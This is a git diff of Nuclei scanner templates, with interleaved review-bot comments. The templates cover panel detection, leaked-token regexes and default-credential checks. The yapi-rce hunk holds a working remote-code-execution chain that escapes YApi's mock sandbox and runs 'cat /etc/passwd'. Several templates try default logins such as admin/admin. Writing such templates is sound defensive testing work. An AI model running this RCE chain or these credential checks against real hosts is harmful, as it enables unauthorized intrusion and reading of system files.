a/poc/api/kube-api-secrets.yaml b/poc/api/kube-api-secrets.yaml index cafadcbdf1..e946725992 100644 --- a/poc/api/kube-api-secrets.yaml +++ b/poc/api/kube-api-secrets.yaml @@ -1,19 +1,23 @@ id: kube-api-secrets + info: name: Kube API Secrets author: sharath severity: info description: Scans for kube secrets endpoint tags: tech,k8s,kubernetes,devops,kube + requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/secrets" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: diff --git a/poc/api/sendgrid-api-key-10142.yaml b/poc/api/sendgrid-api-key-10142.yaml index cb06fc3ffc..88f920b11b 100644 --- a/poc/api/sendgrid-api-key-10142.yaml 
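Review bot: Raising `severity` to `medium` over-rates what the regex proves: an `AIza…` string in a page body is frequently a browser key that is meant to be public, and the template does not check whether the key is restricted. Keep `severity: info` and leave the rating to triage. The rewrite also drops `tags: exposure,token,google`, so tag-based selection and exclusion no longer see this template, and `matchers-condition: and` has nothing to combine when there is a single matcher.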
+++ b/poc/api/sendgrid-api-key-10142.yaml @@ -1,11 +1,9 @@ id: sendgrid-api-key - info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token,sendgrid - + tags: exposure,token requests: - method: GET path: diff --git a/poc/api/strapi-cms-detect.yaml b/poc/api/strapi-cms-detect.yaml index c08945df08..530e120e7e 100644 --- a/poc/api/strapi-cms-detect.yaml +++ b/poc/api/strapi-cms-detect.yaml @@ -1,5 +1,4 @@ id: strapi-cms-detect - info: name: Strapi CMS detect author: cyllective,daffainfo,idealphase @@ -8,12 +7,10 @@ info: reference: - https://github.com/strapi/strapi tags: tech,strapi,cms - requests: - method: GET path: - "{{BaseURL}}/admin/init" - matchers-condition: and matchers: - type: word @@ -23,11 +20,9 @@ requests: - '"uuid"' - '"hasAdmin"' condition: and - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/api/swagger-api-10593.yaml b/poc/api/swagger-api-10593.yaml index 0266733f40..2c4a1de6ba 100644 --- a/poc/api/swagger-api-10593.yaml +++ b/poc/api/swagger-api-10593.yaml @@ -1,12 +1,16 @@ id: swagger-api info: name: Public Swagger API - author: pdteam + author: pdteam,c-sh0 severity: info tags: exposure,api,swagger requests: - method: GET path: + - "{{BaseURL}}/swagger-ui/swagger-ui.js" + - "{{BaseURL}}/swagger/swagger-ui.js" + - "{{BaseURL}}/swagger-ui.js" + - "{{BaseURL}}/swagger/ui/swagger-ui.js" - "{{BaseURL}}/swagger/ui/index" - "{{BaseURL}}/swagger/index.html" - "{{BaseURL}}/swagger-ui.html" @@ -14,6 +18,7 @@ requests: - "{{BaseURL}}/api/swagger-ui.html" - "{{BaseURL}}/api-docs/swagger.json" - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/api_docs" - "{{BaseURL}}/swagger.json" - "{{BaseURL}}/swagger.yaml" - "{{BaseURL}}/swagger/v1/swagger.json" 
@@ -48,6 +53,7 @@ requests: - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/swagger_doc.json" stop-at-first-match: true matchers-condition: and matchers: @@ -62,3 +68,9 @@ requests: - type: status status: - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git a/poc/api/twilio-api.yaml b/poc/api/twilio-api.yaml index 9895746a8a..94674dffe2 100644 --- a/poc/api/twilio-api.yaml +++ b/poc/api/twilio-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" + +# digest: 4b0a00483046022100de47f62e4aba3b07360714c3650501e642d180616b8fadb9c6af82114a17dcbe022100838e8bb6b140938d0a973f78addd50f15927ce43b471f402373a3a8676b4f889:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/wadl-api-11083.yaml b/poc/api/wadl-api-11083.yaml index 35e018d786..1e046a7ef3 100644 --- a/poc/api/wadl-api-11083.yaml +++ b/poc/api/wadl-api-11083.yaml @@ -1,10 +1,10 @@ id: wadl-api info: name: wadl file disclosure - author: 0xrudra & manuelbua + author: 0xrudra,manuelbua severity: info tags: exposure,api - reference: | + reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ requests: 
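Review bot: The dots in the new extractor pattern of swagger-api-10593.yaml are unescaped, so `.` matches any character and the capture is not limited to a dotted version string. Escape them: `- " @version (v[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})"`, or single-quote the pattern and write `\.`. The `@version` banner is presumably present only in the `swagger-ui.js` paths added at the top of the list, so a one-line comment above `extractors:` saying that the other paths yield no version would save the next reader a search.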
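Review bot: The `# digest:` line appended to twilio-api.yaml is a template signature, and this copy is edited in the same hunk (the blank line before `file:` is removed), so the signature may no longer correspond to the file content. A digest that does not verify is worse than none, because it suggests an integrity check that is not there. Either take the file byte-for-byte from where the digest was produced, or drop the digest line; the same applies to the digest added at the end of confluence-detect-1189.yaml.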
@@ -15,26 +15,24 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" + stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" + stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body diff --git a/poc/api/yapi-detect.yaml b/poc/api/yapi-detect.yaml index 8cf92f5a49..3d24ff00ba 100644 --- a/poc/api/yapi-detect.yaml +++ b/poc/api/yapi-detect.yaml @@ -3,12 +3,13 @@ info: name: YApi Detect author: pikpikcu severity: info + metadata: + shodan-query: http.title:"YApi" tags: tech,yapi requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}:3000" + - "{{BaseURL}}" matchers-condition: and matchers: - type: word diff --git a/poc/api/yapi-rce-11726.yaml b/poc/api/yapi-rce-11726.yaml index 0078f2b883..0afebedde5 100644 --- a/poc/api/yapi-rce-11726.yaml +++ b/poc/api/yapi-rce-11726.yaml 
@@ -1,17 +1,19 @@ id: yapi-rce - info: - name: Yapi Remote Code Execution + name: Yapi - Remote Code Execution author: pikpikcu severity: critical - description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: yapi,rce - requests: - raw: - | # REQUEST 1 
@@ -19,42 +21,35 @@ requests: Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* - - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true extractors: - type: regex @@ -64,7 +59,6 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' - - type: regex name: interface_id group: 1 @@ -72,7 +66,6 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' - - type: regex name: project_id group: 1 
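Review bot: The registration body in yapi-rce-11726.yaml now uses `{{randstr}}@interact.sh` instead of `{{randstr}}@example.com`, which replaces a reserved documentation domain with a real third-party one. Any confirmation or notification mail the scanned instance sends for that account then leaves the organisation; keep `@example.com`. Because the requests in this hunk create an account, a project and an interface on the scanned host, the `tags` line in the first hunk should say so, e.g. `tags: yapi,rce,intrusive`, so the template can be excluded from routine scans.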
@@ -80,14 +73,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/atlassian/atlassian-crowd-panel-583.yaml b/poc/atlassian/atlassian-crowd-panel-583.yaml index 4fd18bcda4..c2f2c4aa9d 100644 --- a/poc/atlassian/atlassian-crowd-panel-583.yaml +++ b/poc/atlassian/atlassian-crowd-panel-583.yaml @@ -1,11 +1,8 @@ id: atlassian-crowd-panel - info: name: Atlassian Crowd panel detect author: organiccrap severity: info - tags: panel - requests: - method: GET path: diff --git a/poc/atlassian/atlassian-crowd-panel.yaml b/poc/atlassian/atlassian-crowd-panel.yaml index 3532e9a84c..d01a865ee9 100644 --- a/poc/atlassian/atlassian-crowd-panel.yaml +++ b/poc/atlassian/atlassian-crowd-panel.yaml @@ -1,25 +1,16 @@ id: atlassian-crowd-panel - info: - name: Atlassian Crowd Login Panel + name: Atlassian Crowd panel detect author: organiccrap - severity: info - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ - classification: - cwe-id: CWE-200 - tags: panel,atlassian - + severity: low requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - Atlassian Crowd - Login part: body - -# Enhanced by mp on 2022/03/20 diff --git a/poc/atlassian/bitbucket-takeover-740.yaml b/poc/atlassian/bitbucket-takeover-740.yaml index f9234ad7a3..2987941c14 100644 --- a/poc/atlassian/bitbucket-takeover-740.yaml +++ b/poc/atlassian/bitbucket-takeover-740.yaml 
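Review bot: `severity: low` on the login-panel detection in atlassian-crowd-panel.yaml disagrees with atlassian-crowd-panel-583.yaml just above it, which keeps `severity: info` for the same `id`, and the hunk removes `tags: panel,atlassian` together with the description and reference. Keep `severity: info` and the `tags` line so both copies rank and filter the same way. The added `User-Agent` header pins an old Firefox 55 string without explanation; if the panel needs it, say why in a comment above `headers:`, otherwise drop it.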
@@ -1,25 +1,21 @@ id: bitbucket-takeover - info: name: Bitbucket Takeover Detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - "Repository not found" part: body - - type: word words: - "text/plain" - part: header \ No newline at end of file + part: header diff --git a/poc/atlassian/confluence-detect-1189.yaml b/poc/atlassian/confluence-detect-1189.yaml index 0e17bc5ab9..4809b79801 100644 --- a/poc/atlassian/confluence-detect-1189.yaml +++ b/poc/atlassian/confluence-detect-1189.yaml @@ -1,17 +1,27 @@ id: confluence-detect info: - name: Confluence Detect - author: philippedelteil + name: Confluence Detection + author: philippedelteil,AdamCrosser,6mile severity: info - description: Allows you to detect Atlassian Confluence instances + description: | + This nuclei template is used to detect the presence of Confluence, a popular collaboration software. + classification: + cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:* metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian + max-request: 5 + vendor: atlassian + product: confluence_server + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + category: productivity + tags: tech,confluence,atlassian,detect -requests: +http: - method: GET path: + - "{{BaseURL}}/dologin.action" - "{{BaseURL}}" - "{{BaseURL}}/pages" - "{{BaseURL}}/confluence" 
@@ -19,22 +29,25 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: header - words: - - '-confluence-' - case-insensitive: true - - - type: word - part: body - words: - - 'confluence-base-url' + - type: dsl + dsl: + - contains(to_lower(header), '-confluence-') + - contains(to_lower(body), 'confluence-base-url') extractors: - type: regex - part: body + name: version group: 1 regex: + - '' - 'Atlassian Confluence ([a-z0-9-._]+)' + + - type: regex + name: hostname + group: 1 + regex: + - '' + - '' + - '' +# digest: 4a0a004730450221009bf2f9a3fec8732657aa0e11ec7a7bad6998606a6fdf448adb743732992b14f3022027018043be481632180a2d55600542cba51743a087e2657c16dbd23428ea2382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/atlassian/jira-service-desk-signup-8321.yaml b/poc/atlassian/jira-service-desk-signup-8321.yaml index 6604106545..558b3ff970 100644 --- a/poc/atlassian/jira-service-desk-signup-8321.yaml +++ b/poc/atlassian/jira-service-desk-signup-8321.yaml @@ -3,6 +3,7 @@ info: name: Jira Service Desk Signup author: TechbrunchFR severity: medium + tags: jira,atlassian requests: - method: POST path: diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml index f31db155cc..63e0ccd5e3 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml @@ -1,6 +1,6 @@ id: jira-unauthenticated-dashboards # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR 
diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml index 815cf7212b..695dccaf08 100644 --- a/poc/auth/BlindSQLAuth.yaml +++ b/poc/auth/BlindSQLAuth.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: 3rag + author: Rzizah github.com/rzizah severity: Critical description: Detects time-based blind SQL injection vulnerability http: diff --git a/poc/auth/Shopify-custom-token.yaml b/poc/auth/Shopify-custom-token.yaml index fbdd23d61d..b4ef9d4c53 100644 --- a/poc/auth/Shopify-custom-token.yaml +++ b/poc/auth/Shopify-custom-token.yaml @@ -1,16 +1,13 @@ id: shopify-custom-token - info: name: Shopify Custom App Access Token author: gaurang severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: - - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpca_[a-fA-F0-9]{32}" diff --git a/poc/auth/activemq-default-login-47.yaml b/poc/auth/activemq-default-login-47.yaml index a4dea884a5..ae5ac0f72c 100644 --- a/poc/auth/activemq-default-login-47.yaml +++ b/poc/auth/activemq-default-login-47.yaml @@ -1,18 +1,18 @@ id: activemq-default-login - info: name: Apache ActiveMQ Default Login author: pdteam severity: medium + description: Apache ActiveMQ default login information was discovered. + reference: + - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login - requests: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - user @@ -26,4 +26,6 @@ requests: words: - 'Welcome to the Apache ActiveMQ Console of ' - '

Broker

' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/07 diff --git a/poc/auth/adobe-connect-central-login.yaml b/poc/auth/adobe-connect-central-login.yaml index 1218c9f8d7..fdaf816057 100644 --- a/poc/auth/adobe-connect-central-login.yaml +++ b/poc/auth/adobe-connect-central-login.yaml @@ -1,10 +1,18 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk + description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel + tags: adobe,panel,connect-central + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/aims-password-mgmt-client.yaml b/poc/auth/aims-password-mgmt-client.yaml index a178296f3f..c6f768a5c9 100644 --- a/poc/auth/aims-password-mgmt-client.yaml +++ b/poc/auth/aims-password-mgmt-client.yaml @@ -3,8 +3,16 @@ id: aims-password-mgmt-client info: name: Aims Password Management Client Detect author: iamthefrogy + description: An Aims Password management client was detected. severity: info tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -15,3 +23,5 @@ requests: - type: word words: - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/poc/auth/aims-password-portal-222.yaml b/poc/auth/aims-password-portal-222.yaml index eb21d8e0eb..800dd21cad 100644 --- a/poc/auth/aims-password-portal-222.yaml +++ b/poc/auth/aims-password-portal-222.yaml 
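Review bot: The `classification` block added to poc/auth/adobe-connect-central-login.yaml contains a bare `cve-id:` key, which parses as null; the aims-password-mgmt-client.yaml hunk that follows adds the same. The arcgis-rest-api.yaml hunk in this commit removes exactly that key, so leave it out here too and keep `cvss-metrics`, `cvss-score` and `cwe-id`. In both files `description` is also placed between `author` and `severity`, where the other enhanced templates in this commit put it after `severity`.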
@@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel + tags: panel,aims requests: - method: GET diff --git a/poc/auth/alibaba-mongoshake-unauth.yaml b/poc/auth/alibaba-mongoshake-unauth.yaml index 6de46b6ec7..23048a649f 100644 --- a/poc/auth/alibaba-mongoshake-unauth.yaml +++ b/poc/auth/alibaba-mongoshake-unauth.yaml @@ -4,7 +4,7 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth + tags: mongoshake,unauth,alibaba requests: - method: GET diff --git a/poc/auth/amazon-mws-auth-token-282.yaml b/poc/auth/amazon-mws-auth-token-282.yaml index eb41de1dae..28e8063f5e 100644 --- a/poc/auth/amazon-mws-auth-token-282.yaml +++ b/poc/auth/amazon-mws-auth-token-282.yaml @@ -1,16 +1,13 @@ id: amazon-mws-auth-token - info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - tags: exposure,token,aws,amazon,auth - + tags: exposure,token,aws requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body diff --git a/poc/auth/amazon-mws-auth-token-value.yaml b/poc/auth/amazon-mws-auth-token-value.yaml index 3f66fd9942..0ab5703b9c 100644 --- a/poc/auth/amazon-mws-auth-token-value.yaml +++ b/poc/auth/amazon-mws-auth-token-value.yaml 
@@ -1,24 +1,16 @@ -id: amazon-mws-auth-token-value - -info: - author: puzzlepeaches - name: "Amazon MWS Auth Token" - severity: medium - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - - extractors: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" +id: amazon-mws-auth-token-value + +info: + name: Amazon MWS Auth Token + author: gaurang + severity: medium + tags: token,file,amazon,auth + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/poc/auth/ambari-default-login.yaml b/poc/auth/ambari-default-login.yaml index e251839b56..75b4ec03c1 100644 --- a/poc/auth/ambari-default-login.yaml +++ b/poc/auth/ambari-default-login.yaml @@ -1,11 +1,16 @@ id: ambari-default-login - info: name: Apache Ambari Default Login author: pdteam - severity: medium + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ambari,default-login,apache - requests: - raw: - | @@ -24,3 +29,5 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apc-ups-login.yaml b/poc/auth/apc-ups-login.yaml index f28e384f2c..46722d9e73 100644 --- a/poc/auth/apc-ups-login.yaml +++ b/poc/auth/apc-ups-login.yaml 
@@ -4,7 +4,8 @@ info: name: APC UPS Login author: droberson severity: info - reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + reference: + - https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 tags: iot,panel requests: diff --git a/poc/auth/apisix-default-login-490.yaml b/poc/auth/apisix-default-login-490.yaml index c16b0c60b1..d89104b847 100644 --- a/poc/auth/apisix-default-login-490.yaml +++ b/poc/auth/apisix-default-login-490.yaml @@ -1,13 +1,22 @@ id: apisix-default-login + info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + tags: apisix,apache,default-login + requests: - raw: - | @@ -18,20 +27,25 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - admin pass: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '"data"' - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apollo-default-login.yaml b/poc/auth/apollo-default-login.yaml index 696e2a1121..c9e119d097 100644 --- a/poc/auth/apollo-default-login.yaml +++ b/poc/auth/apollo-default-login.yaml 
@@ -1,18 +1,20 @@ id: apollo-default-login + info: name: Apollo Default Login author: PaperPen severity: high description: An Apollo default login was discovered. - metadata: - shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:11794165 tags: apollo,default-login + requests: - raw: - | @@ -23,15 +25,18 @@ requests: Referer: {{BaseURL}}/signin? username={{user}}&password={{pass}}&login-submit=Login + - | GET /user HTTP/1.1 Host: {{Hostname}} + attack: pitchfork payloads: user: - apollo pass: - admin + cookie-reuse: true req-condition: true matchers-condition: and @@ -42,6 +47,7 @@ requests: - '"userId":' - '"email":' condition: or + - type: dsl dsl: - "status_code_1 == 302 && status_code_2 == 200" diff --git a/poc/auth/arl-default-login-539.yaml b/poc/auth/arl-default-login-539.yaml index 50f4ac4d1c..0b8d67077d 100644 --- a/poc/auth/arl-default-login-539.yaml +++ b/poc/auth/arl-default-login-539.yaml @@ -1,13 +1,8 @@ id: arl-default-login info: - name: ARL Default Admin Login + name: ARL Default Login author: pikpikcu - description: An ARL default admin login was discovered. severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: arl,default-login requests: - raw: @@ -34,5 +29,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/atvise-login-589.yaml b/poc/auth/atvise-login-589.yaml index 74ba38fb08..360d06ce3b 100644 --- a/poc/auth/atvise-login-589.yaml +++ b/poc/auth/atvise-login-589.yaml 
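Review bot: The new side of the arl-default-login hunk drops `description` and the whole `classification` block (`cvss-metrics`, `cvss-score`, `cwe-id: CWE-522`), so findings from this default-credential check lose the CWE and CVSS data that triage and reporting rely on. The same loss appears in the azkaban-default-login, CVE-2018-5233, CVE-2018-6910, CVE-2018-8033, CVE-2019-19781, CVE-2019-20141 and CVE-2019-6112 hunks, while the ambari, apisix and canal hunks in this commit add those same fields. I would keep `classification:` with `cwe-id: CWE-522` here, as the apollo hunk just before it does.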
@@ -9,13 +9,10 @@ info: - https://www.exploit-db.com/ghdb/7837 - https://www.atvise.com/en classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 metadata: - google-dork: intitle:"atvise - next generation" - tags: panel,atvise + google-query: intitle:"atvise - next generation" + tags: panel,atvise,edb requests: - method: GET diff --git a/poc/auth/avatier-password-management.yaml b/poc/auth/avatier-password-management.yaml index 49cd4c37ae..62d6395e8a 100644 --- a/poc/auth/avatier-password-management.yaml +++ b/poc/auth/avatier-password-management.yaml @@ -1,37 +1,32 @@ id: avatier-password-management info: - name: Avatier Password Management Panel - author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK + name: Avatier Password Management Panel Detect + author: praetorian-thendrickson severity: info description: An Avatier password management panel was detected. reference: - - https://www.exploit-db.com/ghdb/6576 - - https://www.avatier.com/products/identity-management/password-management/ - classification: - cwe-id: CWE-200 + - https://www.avatier.com metadata: shodan-query: http.favicon.hash:983734701 - tags: panel,avatier,aims + tags: panel,avatier + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: + cwe-id: CWE-200 requests: - method: GET path: - '{{BaseURL}}/aims/ps/' - redirects: true - max-redirects: 2 - matchers-condition: or + matchers-condition: and matchers: - type: word words: - 'LabelWelcomeToPS' - 'Avatier Corporation' - - 'Welcome to Password Management' - condition: or - - - type: word - words: - - 'Password Management Client' + condition: and # Enhanced by mp on 2022/03/20 diff --git a/poc/auth/aws-access-key-value-622.yaml b/poc/auth/aws-access-key-value-622.yaml index 1448677b12..b942b0a23a 100644 --- a/poc/auth/aws-access-key-value-622.yaml +++ b/poc/auth/aws-access-key-value-622.yaml 
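Review bot: The avatier-password-management hunk adds a bare `cve-id:` under `classification`, which YAML loads as null rather than as an absent field; the atvise hunk just before it removes exactly that empty key. The added `cvss-score: 5.3` also sits next to `severity: info`, so the two ratings disagree for what is a panel detection. I would drop the `cve-id:` line and keep only `cwe-id: CWE-200` in the block. Separately, `matchers-condition: and` now governs a single matcher, so that line no longer has any effect.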
@@ -4,19 +4,13 @@ info: name: AWS Access Key ID Value author: Swissky severity: info + tags: exposure,token,aws,amazon requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" - extractors: - type: regex part: body diff --git a/poc/auth/azkaban-default-login-674.yaml b/poc/auth/azkaban-default-login-674.yaml index 5e705ae10d..5d9e13ca58 100644 --- a/poc/auth/azkaban-default-login-674.yaml +++ b/poc/auth/azkaban-default-login-674.yaml 
@@ -1,47 +1,47 @@ -id: azkaban-default-login -info: - name: Azkaban Web Client Default Credential - author: pussycat0x - severity: high - description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. - reference: - - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 - tags: default-login,azkaban - classification: - cwe-id: CWE-798 -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=login&username={{username}}&password={{password}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - '"session.id"' - - '"success"' - condition: and - - type: word - words: - - 'azkaban.browser.session.id' - - 'application/json' - condition: and - part: header - - type: status - status: - - 200 - extractors: - - type: kval - kval: - - azkaban.browser.session.id - -# Enhanced by mp on 2022/03/03 +id: azkaban-default-login + +info: + name: Azkaban Web Client Default Credential + author: pussycat0x + severity: high + reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + tags: default-login,azkaban + +requests: + - raw: + - | + POST / 